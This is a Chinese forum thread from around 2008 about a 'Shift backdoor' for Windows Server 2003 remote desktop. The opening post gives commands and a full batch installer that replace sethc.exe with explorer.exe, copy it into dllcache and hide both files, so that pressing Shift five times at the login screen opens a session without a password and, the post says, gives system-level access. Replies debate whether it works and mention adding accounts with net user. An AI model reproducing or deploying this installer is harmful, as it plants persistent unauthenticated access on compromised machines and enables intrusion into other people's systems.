|
无需输入密码登陆3389远程终端
在肉鸡上执行命令
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
以后再连接肉鸡3389,敲5下shift键就可以直接进入了,无需输入密码,只是登陆上去没有任务栏,一直会有密码登陆框,不过够我们做很多事情了,目前win2003测试通过。
似乎2000也可以,XP不行。这两个系统没测试。
不知道有牛人知道是什么道理不.
小道消息:连敲5次shift就自动激活连滞键设置~~也就是自动执行sethc.exe ,你把explorer.exe换成sethc.exe 就是自动执行explorer.exe
Shift后门TT整理版
来源:TT's Blog
将下面的代码保存为tt.bat 然后到主机上运行~后门的启动了~
然后连接对方3389然后连续按5次Shift就能进入盘里了 然后进入c:\windows\system32\cmd.exe
或者建个bat内容为 call cmd.xe 就是系统权限了~管理员把你先的用户删了也不怕~
哇哈哈哈哈~~~
TITLE Shift后门
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门 By:TT 整合 QQ:869293
echo.
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕!
echo.
echo 感谢您使用Shift后门
echo.
echo By:TT QQ: 869293
echo.
echo [url=http://www.hack518.net/]http://www.hack518.net[/url]
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit |
|
| 一般win2003都会设置较复杂的密码,采用空连接很难实现远程控制的功能. |
|
| 没必要用这个了 这不行啊 !你想当黑客啊 !做梦吧 啊哈哈 |
|
| 能够执行这个命令的话,那net user user pass /add 这样不是更轻松? |
|
net use\\IP\IPC$ "password" /user:"administrator"这个需要管理员密码,一般高手都禁掉NETBIOS的,停用adminstrator账号
你如何用这个命令 |
| happycat_no.1 | | 2008-4-14 13:08 |
|
理论上有点道理.
也就是利用了系统的某些快捷键
[[i] 本帖最后由 happycat_no.1 于 2008-4-14 21:11 编辑 [/i]] |
|
这个前题是能接触到那台PC,手工操作复制文件,或传播病毒给这台PC。
如果能远程拷贝的话,还要你说的这些做什么,都在直接操作那台PC了~! |
| maxuefeixw | | 2008-5-27 14:00 |
|
呵呵...怎么感觉有点多此一举样的 不过还是顶下楼主
这个都用到了... |
| fkesse1314 | | 2008-5-30 01:17 |
|
| 学习中..... |
|
| 似乎只有空密码才能连接,在服务器上这样设置的可能几乎没有吧。 |
关键词: 终端
相关文章: 利用IE登陆windows 2003 的终端服务器 非常好用的超级终端!!! 终端客户机连接问题 在你的Ubuntu Linux桌面上嵌入终端窗口 终端管理软件
Powered by 51CTO.COM
|